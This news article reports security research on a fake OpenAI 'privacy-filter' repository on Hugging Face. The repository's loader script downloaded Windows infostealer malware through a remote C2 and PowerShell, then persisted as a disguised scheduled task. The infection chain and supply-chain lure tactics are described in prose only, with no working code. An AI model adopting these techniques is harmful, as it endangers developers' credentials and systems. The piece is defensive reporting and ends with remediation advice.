A malicious Hugging Face repository claiming to be an OpenAI release has been distributing infostealer malware for Windows systems and had amassed close to 244,000 downloads prior to its removal, revealed a recent study conducted by HiddenLayer, an AI security firm. However, due to potential tampering on the part of the malicious actors to inflate the figures, the scope of the impact caused remains unclear.
The fake release ‘Open-OSS/privacy-filter’ was modeled after the actual Privacy Filter from OpenAI, according to HiddenLayer. According to HiddenLayer, the original model card was copied almost verbatim and included a malicious loader.py file which loaded and executed credential-stealing malware on the victims’ Windows machines.
The malicious repos attained top position on Hugging Face’s ‘trending’ list within just 18 hours, accumulating 667 likes – again, potentially tampered with by the attackers to increase its attractiveness.
Also Read : Physical AI Is Bringing Humanoid Robots to Real Factories
Public AI model repositories may be starting to pose a threat in the software supply chain as more and more developers and data scientists start cloning them directly into their corporate settings which include access to source code, cloud credentials, and internal systems.
While the README file of the counterfeit model was similar to that of the real project, it differed from the original by suggesting running start.bat under Windows and python loader.py under Linux and macOS, which were key elements of the infection routine as revealed by HiddenLayer.
Security experts had previously issued warnings about malware being injected into AI models and their associated setup files on Hugging Face and other similar repositories. In previous instances, the malware was embedded within Pickle-serialized model files.
Also Read : The AI Last Mile: Why Imperfect Data Matters More Than Bigger Models
Harmful loader posing as setup routine
HiddenLayer reported that loader.py started with some decoy code resembling an AI model loader and transitioned fast into an invisible infection chain. A script that could bypass the SSL verification downloaded a base64-decoded URL referring to jsonkeeper.com, downloaded the payload instructions remotely, and issued commands through PowerShell for systems running on Windows.
As HiddenLayer reported, the use of the C2 channel jsonkeeper.com allowed the attackers to change the payloads without altering any code in the repo.
The payload delivered through the use of the PowerShell command downloaded an additional batch file from the attacker’s domain, whereafter the malware used the method of persistence by generating a scheduled task similar to an Edge browser update process.
The infostealer created using the Rust programming language targeted chromium and Firefox-derived browsers, Discord local storage, crypto wallets, FileZilla configuration files, and host information.
Campaigns on a wider scale
The HiddenLayer research firm has reported that the same team had managed to find six other Hugging Face repos with nearly identical loader logic that shared the infrastructure used in the aforementioned attack.
This incident is similar to previous warnings about threats to AI on HuggingFace. These threats range from AI poisoning to OpenClaw installer malware. The common denominator here is that attackers leverage AI model development processes for breaching secure environments. AI repos typically include executables, setup information, dependencies, notebooks, and scripts – hence it is the peripheral stuff that poses a threat, rather than the models themselves.
According to Sakshi Grover, senior research manager for cybersecurity services at IDC, the traditional approach to software composition analysis was aimed at analyzing dependency manifests, libraries, and container images. Traditional SCA is not very well-equipped when it comes to detecting any malicious loader logic within AI repos. Sakshi Grover then cited the FutureScape report by IDC published in November 2025. According to this report, by 2027, a BOM for agentic AI system should account for 60% of agentic AI systems in place.
Response and Mitigation
The HiddenLayer organization recommended that if someone was using the code of Open-OSS/privacy-filter and executing start.bat, python loader.py, or any other file from this repository on a Windows system, they should consider their system as infected and should be reimaged. Sessions of the browser could be compromised even if they were not holding passwords on the computer itself.
